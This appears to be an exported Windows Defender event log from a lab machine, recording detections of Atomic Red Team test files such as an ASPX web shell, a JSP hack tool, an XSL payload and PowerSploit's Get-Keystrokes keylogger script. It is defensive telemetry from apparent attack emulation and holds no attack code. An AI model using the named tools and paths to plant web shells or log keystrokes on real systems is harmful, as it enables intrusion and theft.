AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
AM: 1.1.16100.4, NIS: 0.0.0.0
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482477.632054,2019-07-19T00:41:17.632054+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Category ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"
1116
0
3
0
0
0x8000000000000000
76
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}
2019-07-18T20:40:18.385Z
2147683177
Backdoor:ASP/Ace.T
5
Severe
6
Backdoor
https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0
1
1
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx
1
%%845
1
%%813
0
%%822
0
9
%%887
0x00000000
The operation completed successfully.
0
0
No additional actions required
AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0
AM: 1.1.16100.4, NIS: 1.1.16100.4
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482477.508276,2019-07-19T00:41:17.508276+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Category ( Tool ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"
1116
0
3
0
0
0x8000000000000000
75
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}
2019-07-18T20:40:16.697Z
2147708292
HackTool:JS/Jsprat
4
High
34
Tool
https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0
1
1
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005)
1
%%845
1
%%813
8
%%862
0
9
%%887
0x00000000
The operation completed successfully.
0
0
No additional actions required
AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0
AM: 1.1.16100.4, NIS: 1.1.16100.4
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482475.439635,2019-07-19T00:41:15.439635+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Category ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"
1116
0
3
0
0
0x8000000000000000
48
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{8791B1FB-0FE7-412E-B084-524CB5A221F3}
2019-07-18T20:40:13.775Z
2147735426
Trojan:XML/Exeselrun.gen!A
5
Severe
8
Trojan
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0
1
1
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl
1
%%845
1
%%813
2
%%823
0
9
%%887
0x00000000
The operation completed successfully.
0
0
No additional actions required
AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0
AM: 1.1.16100.4, NIS: 1.1.16100.4
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Suspicious Command or process found in the log,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,Found a log containing a suspicious PowerShell command ( Get-Keystrokes),1116,"
1116
0
3
0
0
0x8000000000000000
37
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{511224D4-1EB4-47B9-BC4A-37E21F923FED}
2019-07-18T20:40:00.580Z
2147725349
Trojan:PowerShell/Powersploit.M
5
Severe
8
Trojan
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0
1
1
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1
1
%%845
1
%%813
0
%%822
0
9
%%887
0x00000000
The operation completed successfully.
0
0
No additional actions required
AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0
AM: 1.1.16100.4, NIS: 1.1.16100.4
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Category ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"
1116
0
3
0
0
0x8000000000000000
37
Microsoft-Windows-Windows Defender/Operational
MSEDGEWIN10
%%827
4.18.1906.3
{511224D4-1EB4-47B9-BC4A-37E21F923FED}
2019-07-18T20:40:00.580Z
2147725349
Trojan:PowerShell/Powersploit.M
5
Severe
8
Trojan
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0
1
1
3
%%818
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1
1
%%845
1
%%813
0
%%822
0
9
%%887
0x00000000
The operation completed successfully.
0
0
No additional actions required
AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0
AM: 1.1.16100.4, NIS: 1.1.16100.4
",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational